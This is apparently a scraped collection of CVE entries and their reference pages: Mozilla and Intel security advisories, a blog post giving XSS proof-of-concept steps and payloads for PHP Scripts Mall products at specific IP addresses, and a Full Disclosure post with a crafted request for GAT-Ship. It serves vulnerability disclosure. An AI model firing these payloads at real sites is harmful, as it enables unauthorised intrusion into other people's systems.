The events-manager plugin before 5.6 for WordPress has code injection.

CVE-2015-9298: Events Manager

The FV Flowplayer Video Player plugin before 7.3.14.727 for WordPress allows email subscription XSS.

CVE-2019-14799: FV Flowplayer Video Player

The Tribulant Newsletters plugin before 4.6.19 for WordPress allows XSS via the wp-admin/admin-ajax.php?action=newsletters_load_new_editor contentarea parameter.

CVE-2019-14787: Newsletters

A type confusion vulnerability can occur when manipulating JavaScript objects due to issues in Array.pop. This can allow for an exploitable crash. We are aware of targeted attacks in the wild abusing this flaw. This vulnerability affects Firefox ESR < 60.7.1, Firefox < 67.0.3, and Thunderbird < 60.7.2.

**Mozilla Foundation Security Advisory 2019-20**

Announced

June 20, 2019

Impact

high

Products

Thunderbird

Fixed in

*   Thunderbird 60.7.2

_In general, these flaws cannot be exploited through email in the Thunderbird product because scripting is disabled when reading mail, but are potentially risks in browser or browser-like contexts._

**#CVE-2019-11707: Type confusion in Array.pop**

Reporter

Samuel Groß of Google Project Zero, Coinbase Security

Impact

critical

**Description**

A type confusion vulnerability can occur when manipulating JavaScript objects due to issues in Array.pop. This can allow for an exploitable crash. We are aware of targeted attacks in the wild abusing this flaw.

**References**

*   Bug 1544386

**#CVE-2019-11708: sandbox escape using Prompt:Open**

Reporter

Coinbase Security

Impact

high

**Description**

Insufficient vetting of parameters passed with the Prompt:Open IPC message between child and parent processes can result in the non-sandboxed parent process opening web content chosen by a compromised child process. When combined with additional vulnerabilities this could result in executing arbitrary code on the user's computer.

**References**

*   Bug 1559858

CVE-2019-11707: Security vulnerabilities fixed in Thunderbird 60.7.2

As part of a winning Pwn2Own entry, a researcher demonstrated a sandbox escape by installing a malicious language pack and then opening a browser feature that used the compromised translation. This vulnerability affects Firefox ESR < 60.8, Firefox < 68, and Thunderbird < 60.8.

Sorry, I can't find "_1538007?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2019-9811: Invalid Bug ID

Activity Stream can display content from sent from the Snippet Service website. This content is written to innerHTML on the Activity Stream page without sanitization, allowing for a potential access to other information available to the Activity Stream, such as browsing history, if the Snipper Service were compromised. This vulnerability affects Firefox < 68.

**Mozilla Foundation Security Advisory 2019-21**

Announced

July 9, 2019

Impact

critical

Products

Firefox

Fixed in

*   Firefox 68

**#CVE-2019-9811: Sandbox escape via installation of malicious language pack**

Reporter

Niklas Baumstark

Impact

high

**Description**

As part of his winning Pwn2Own entry, Niklas Baumstark demonstrated a sandbox escape by installing a malicious language pack and then opening a browser feature that used the compromised translation.

**References**

*   Bug 1538007
*   Bug 1539598
*   Bug 1539759
*   Bug 1523741
*   Bug 1563327

**#CVE-2019-11711: Script injection within domain through inner window reuse**

Reporter

Boris Zbarsky

Impact

high

**Description**

When an inner window is reused, it does not consider the use of document.domain for cross-origin protections. If pages on different subdomains ever cooperatively use document.domain, then either page can abuse this to inject script into arbitrary pages on the other subdomain, even those that did not use document.domain to relax their origin security.

**References**

*   Bug 1552541

**#CVE-2019-11712: Cross-origin POST requests can be made with NPAPI plugins by following 308 redirects**

Reporter

Gregory Smiley of Security Compass

Impact

high

**Description**

POST requests made by NPAPI plugins, such as Flash, that receive a status 308 redirect response can bypass CORS requirements. This can allow an attacker to perform Cross-Site Request Forgery (CSRF) attacks.

**References**

*   Bug 1543804

**#CVE-2019-11713: Use-after-free with HTTP/2 cached stream**

Reporter

Hanno Böck

Impact

high

**Description**

A use-after-free vulnerability can occur in HTTP/2 when a cached HTTP/2 stream is closed while still in use, resulting in a potentially exploitable crash.

**References**

*   Bug 1528481

**#CVE-2019-11714: NeckoChild can trigger crash when accessed off of main thread**

Reporter

Hanno Böck

Impact

moderate

**Description**

Necko can access a child on the wrong thread during UDP connections, resulting in a potentially exploitable crash in some instances.

**References**

*   Bug 1542593

**#CVE-2019-11729: Empty or malformed p256-ECDH public keys may trigger a segmentation fault**

Reporter

Jonas Allmann

Impact

moderate

**Description**

Empty or malformed p256-ECDH public keys may trigger a segmentation fault due values being improperly sanitized before being copied into memory and used.

**References**

*   Bug 1515342

**#CVE-2019-11715: HTML parsing error can contribute to content XSS**

Reporter

Linus Särud

Impact

moderate

**Description**

Due to an error while parsing page content, it is possible for properly sanitized user input to be misinterpreted and lead to XSS hazards on web sites in certain circumstances.

**References**

*   Bug 1555523

**#CVE-2019-11716: globalThis not enumerable until accessed**

Reporter

Chris Hacking

Impact

moderate

**Description**

Until explicitly accessed by script, window.globalThis is not enumerable and, as a result, is not visible to code such as Object.getOwnPropertyNames(window). Sites that deploy a sandboxing that depends on enumerating and freezing access to the window object may miss this, allowing their sandboxes to be bypassed.

**References**

*   Bug 1552632

**#CVE-2019-11717: Caret character improperly escaped in origins**

Reporter

Tyson Smith

Impact

moderate

**Description**

A vulnerability exists where the caret ("^") character is improperly escaped constructing some URIs due to it being used as a separator, allowing for possible spoofing of origin attributes.

**References**

*   Bug 1548306

**#CVE-2019-11718: Activity Stream writes unsanitized content to innerHTML**

Reporter

Mark Banner

Impact

moderate

**Description**

Activity Stream can display content from sent from the Snippet Service website. This content is written to innerHTML on the Activity Stream page without sanitization, allowing for a potential access to other information available to the Activity Stream, such as browsing history, if the Snipper Service were compromised.

**References**

*   Bug 1408349

**#CVE-2019-11719: Out-of-bounds read when importing curve25519 private key**

Reporter

Henry Corrigan-Gibbs

Impact

moderate

**Description**

When importing a curve25519 private key in PKCS#8format with leading 0x00 bytes, it is possible to trigger an out-of-bounds read in the Network Security Services (NSS) library. This could lead to information disclosure.

**References**

*   Bug 1540541

**#CVE-2019-11720: Character encoding XSS vulnerability**

Reporter

Rakesh Mane

Impact

moderate

**Description**

Some unicode characters are incorrectly treated as whitespace during the parsing of web content instead of triggering parsing errors. This allows malicious code to then be processed, evading cross-site scripting (XSS) filtering.

**References**

*   Bug 1556230

**#CVE-2019-11721: Domain spoofing through unicode latin 'kra' character**

Reporter

Anonymous

Impact

moderate

**Description**

The unicode latin 'kra' character can be used to spoof a standard 'k' character in the addressbar. This allows for domain spoofing attacks as do not display as punycode text, allowing for user confusion.

**References**

*   Bug 1256009

**#CVE-2019-11730: Same-origin policy treats all files in a directory as having the same-origin**

Reporter

Luigi Gubello

Impact

moderate

**Description**

A vulnerability exists where if a user opens a locally saved HTML file, this file can use file: URIs to access other files in the same directory or sub-directories if the names are known or guessed. The Fetch API can then be used to read the contents of any files stored in these directories and they may uploaded to a server. Luigi Gubello demonstrated that in combination with a popular Android messaging app, if a malicious HTML attachment is sent to a user and they opened that attachment in Firefox, due to that app's predictable pattern for locally-saved file names, it is possible to read attachments the victim received from other correspondents.

**References**

*   Bug 1558299

**#CVE-2019-11723: Cookie leakage during add-on fetching across private browsing boundaries**

Reporter

Andreas Wagner

Impact

low

**Description**

A vulnerability exists during the installation of add-ons where the initial fetch ignored the origin attributes of the browsing context. This could leak cookies in private browsing mode or across different "containers" for people who use the Firefox Multi-Account Containers Web Extension.

**References**

*   Bug 1528335

**#CVE-2019-11724: Retired site input.mozilla.org has remote troubleshooting permissions**

Reporter

Frederik Braun

Impact

low

**Description**

Application permissions give additional remote troubleshooting permission to the site input.mozilla.org, which has been retired and now redirects to another site. This additional permission is unnecessary and is a potential vector for malicious attacks.

**References**

*   Bug 1512511

**#CVE-2019-11725: Websocket resources bypass safebrowsing protections**

Reporter

Andrey

Impact

low

**Description**

When a user navigates to site marked as unsafe by the Safebrowsing API, warning messages are displayed and navigation is interrupted but resources from the same site loaded through websockets are not blocked, leading to the loading of unsafe resources and bypassing safebrowsing protections.

**References**

*   Bug 1483510

**#CVE-2019-11727: PKCS#1 v1.5 signatures can be used for TLS 1.3**

Reporter

Hubert Kario

Impact

low

**Description**

A vulnerability exists where it possible to force Network Security Services (NSS) to sign CertificateVerify with PKCS#1 v1.5 signatures when those are the only ones advertised by server in CertificateRequest in TLS 1.3. PKCS#1 v1.5 signatures should not be used for TLS 1.3 messages.

**References**

*   Bug 1552208

**#CVE-2019-11728: Port scanning through Alt-Svc header**

Reporter

Trishita Tiwari, Ari Trachtenberg

Impact

low

**Description**

The HTTP Alternative Services header, Alt-Svc, can be used by a malicious site to scan all TCP ports of any host that the accessible to a user when web content is loaded.

**References**

*   Bug 1552993

**#CVE-2019-11710: Memory safety bugs fixed in Firefox 68**

Reporter

Mozilla developers and community

Impact

critical

**Description**

Mozilla developers and community members André Bargull, Christian Holler, Natalia Csoregi, Raul Gurzau, Daniel Varga, Jon Coppeard, Marcia Knous, Gary Kwong, Randell Jesup, David Bolter, Jeff Gilbert, and Deian Stefan reported memory safety bugs present in Firefox 67. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 68

**#CVE-2019-11709: Memory safety bugs fixed in Firefox 68 and Firefox ESR 60.8**

Reporter

Mozilla developers and community

Impact

critical

**Description**

Mozilla developers and community members Andreea Pavel, Christian Holler, Honza Bambas, Jason Kratzer, and Jeff Gilbert reported memory safety bugs present in Firefox 67 and Firefox ESR 60.7. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 68 and Firefox ESR 60.8

CVE-2019-11718: Security vulnerabilities fixed in Firefox 68

Insufficient password protection in the attestation database for Open CIT may allow an authenticated user to potentially enable information disclosure via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Open Cloud Integrity Technology and OpenAttestation Advisory**

**Summary: **

Multiple potential security vulnerabilities in Open Cloud Integrity Technology (Open CIT) and OpenAttestation may allow information disclosure. Intel is releasing software updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2019-0179

Description: Insufficient password protection in the attestation database for Open CIT may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 4.4 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

CVEID: CVE-2019-0180

Description: Insufficient password protection in the configuration files for Open CIT may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 4.4 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

CVEID: CVE-2019-0178

Description: A race condition in the agent service for Open CIT may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 4.4 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

CVEID: CVE-2019-0177

Description: Insufficient input validation in the attestation process for Open CIT may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 4.4 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

CVEID: CVE-2019-0175

Description: Insufficient session validation in the attestation process for OpenAttestation may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 4.4 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

CVEID: CVE-2019-0181

Description: Improper input validation in the database for Open CIT and OpenAttestation may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVEID: CVE-2019-0182

Description: Relative path traversal in the login routine for Open CIT and OpenAttestation may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 3.3 Low

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

CVEID: CVE-2019-0183

Description: Insufficient password handling in the login routine for Open CIT may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 3.3 Low

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

CVEID: CVE-2019-11092

Description: Insufficient password handling in the login routine for Open CIT may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 4.4 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

**Affected Products:**

All versions of Open CIT and OpenAttestation.

**Recommendation:**

Intel recommends users of Open CIT and OpenAttestation discontinue use and move to Intel® Security Libraries for Data Center (Intel® SecL-DC).

Updates are available for download at this location: https://01.org/intel-secl

**Acknowledgements:**

These issues were found internally by Intel.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are deployed.

**Revision History**

Revision

Date

Description

1.0

06/11/2019  

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2019-0181: INTEL-SA-00248

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® Xeon® W Processors**

Helping deliver a giant leap in performance and platform capabilities for professional creatives, engineers and data scientists.

Learn more

Innovation

**4th Gen Intel® Xeon® Scalable Processors**

With the most built-in accelerators of any CPU on the market, 4th Gen Intel® Xeon® Scalable processors accelerate performance for AI and other emerging workloads.

**Accelerate Your Most Advanced Edge Workloads**

Deliver performance, connectivity, memory, and accelerated AI with 4th Gen Intel® Xeon® Scalable processors for edge applications.

**Enable Edge Networks**

Improve network capacity and total cost of ownership while meeting power consumption and space requirements for 5G and network infrastructure.

**The Future of Acceleration Has Arrived**

Discover the future of acceleration with the launch of our highly anticipated 4th Gen Intel® Xeon® Scalable processors and other innovations.

Innovation

**Introducing Intel® Xeon® CPU Max Series**

Reduce the bottlenecks of memory-bound applications to deliver breakthrough performance with up to 56 performance cores, 64GB of high bandwidth memory, and cost and time savings with the only x86-based processor with high-bandwidth memory (HBM).

Data Center

**Introducing Intel® Data Center GPU Max Series**

Maximize impact with the Intel® Data Center GPU Max Series, Intel’s highest performing, highest density, general-purpose discrete GPU, which packs over 100 billion transistors into one package and contains up to 128 Xe Cores–Intel’s foundational GPU compute building block.

Innovation

**Intel at Mobile World Congress Barcelona**

Join us at MWC Barcelona to experience how Intel is speeding the shift to fully programmable, software-defined, cloud-native networks that unleash the possibilities of 5G, AI, and the Intelligent Edge.

Innovation

**13th Gen Intel® Core™ Mobile Processors for Edge**

With industrial-grade features and extended temperature ranges of -40C to 100C (available on select SKUs), 13th Gen Intel® Core™ mobile processors combine power efficiency and consistent performance for AI, graphics, and industrial-grade apps.

CVE-2019-0177: Intel | Data Center Solutions, IoT, and PC Innovation

PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1 has Stored XSS in the Profile Update page via the My Name field.

**CVE-2019-7553 Stores XSS in PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1**

**_DESCRIPTION_**

**PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1 has**  
 **Stored XSS in the Profile Update page via the My Name field.**  

**_VENDOR_**

PHP Scripts Mall Pvt. Ltd.  
 _\[Affected Product Code Base\]_PHP Scripts Mall Chartered Accountant : Auditor Website - 2.0.1  
  

**_POC_**

 Steps to reproduce-

Go to http://74.124.215.220/~projclient/client/auditor

 1. Register and login an account.

2\. GO to My Profile and update the My name field with the xss payload

  <--\`<img/src=\` onerror=alert("Pw")> --!>.

3\. The xss will be executed throughout all the pages visited.

**Popular posts from this blog**

DESCRIPTION An issue was discovered in PHP Scripts Mall Investment MLM Software 2.0.2.  Stored XSS was found in the the My Profile Section. This is due to lack of sanitization in the Edit Name section. VENDOR PHP Scripts Mall Pvt. Ltd.   \[Affected Product Code Base\] Investment MLM Software(link- https://www.phps criptsmall.com/product/investm ent-mlm/ ) - 2.0.2 POC 1.GO to  http://198.38.86.159/~onlineex amboard/demo/investment-mlm/ 2. Request a test account "Click Here For User Demo Link" 3. Login and go to my profile. 4. Input payload  <script>alert(document.domain) </script>  and xss gets popped. PROOF

DESCRIPTION An issue was discovered in PHP Scripts Mall API Based Travel Booking 3.4.7. There is Reflected XSS via the flight-results.php d2 parameter. Tested in Firefox Dev Edition VENDOR PHP Scripts Mall Pvt. Ltd.   \[Affected Product Code Base\] API based travel booking - 3.4.7 POC 1.GO to  http://74.124.215.220/~config/cleotravel/flight-results.php?a1=adf&a2=adfdf&d1=&d2=%22Style=%22position:fixed;top:0;left:0;font-size:999px;%22OnMouseEnter=%22confirm\`K\`%22 REFLECTED XSS POPPED

CVE-2019-7553: CVE-2019-7553 Stores XSS in PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1

GAT-Ship Web Module through 1.30 allows remote attackers to obtain potentially sensitive information via {} in a ws/gatshipWs.asmx/SqlVersion request.

**Full Disclosure mailing list archives****GAT-Ship Web Module >1.30 - Unauthenticated Information Disclosure Vulnerability**

_From_: <gionreale () tutanota com>  
_Date_: Fri, 17 May 2019 13:43:49 +0200 (CEST)  

GAT-Ship Web Module >1.30 - Unauthenticated Information Disclosure Vulnerability


It is possible in versions 1.30 and below for unauthenticated attackers to query the GAT-Ship Web Module for system 
information via a crafted request:

PoC:
---------------------------------------------------------------------------------------------------------------------------------------

POST /ws/gatshipWs.asmx/SqlVersion <http://gatshipWs.asmx/SqlVersion\> HTTP/1.1
 User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:52.0) Gecko/20100101 Firefox/52.0
 Accept: application/json, text/javascript, \*/\*; q=0.01
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/json; charset=utf-8
 X-Requested-With: XMLHttpRequest 
 Content-Length: 2
 DNT: 1
 Connection: close
 
 {}

--------------------------------------------------------------------------------------------------------------------------------------------------




HTTP/1.1 200 OK
 Cache-Control: private, max-age=0
 Content-Type: application/json; charset=utf-8
 Server: Microsoft-IIS/X.X
 X-AspNet-Version: X.X.XXXXX
 X-Powered-By: ASP.NET
 Date: Mon, XX XXX 20XX 06:55:31 GMT
 Connection: close
 Content-Length: 310
 
 {"d":{"\_\_type":"webModule.ws.gatshipWs+ResponsObject","ResponsType":0,"MessageText":null,"Data":"Microsoft SQL Server 
20XX (SPX) - XX.X.XXXX.X (X64) \\n\\tDec 28 20XX 20:23:12 \\n\\tCopyright (c) Microsoft Corporation\\n\\tStandard Edition 
(64-bit) on Windows XX XX \\u003cX64\\u003e (Build XXXX: Service Pack X)\\n"}}

===================================================================================

Values in PoC removed for security reasons.


Disclosed: 16 Jul 2018

Fix: Upgrade to current version.


Discovered by Gionathan Armando Reale


\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **GAT-Ship Web Module >1.30 - Unauthenticated Information Disclosure Vulnerability** _gionreale (May 17)_
    *   Re: GAT-Ship Web Module >1.30 - Unauthenticated Information Disclosure Vulnerability _gionreale (May 21)_

Tag

#firefox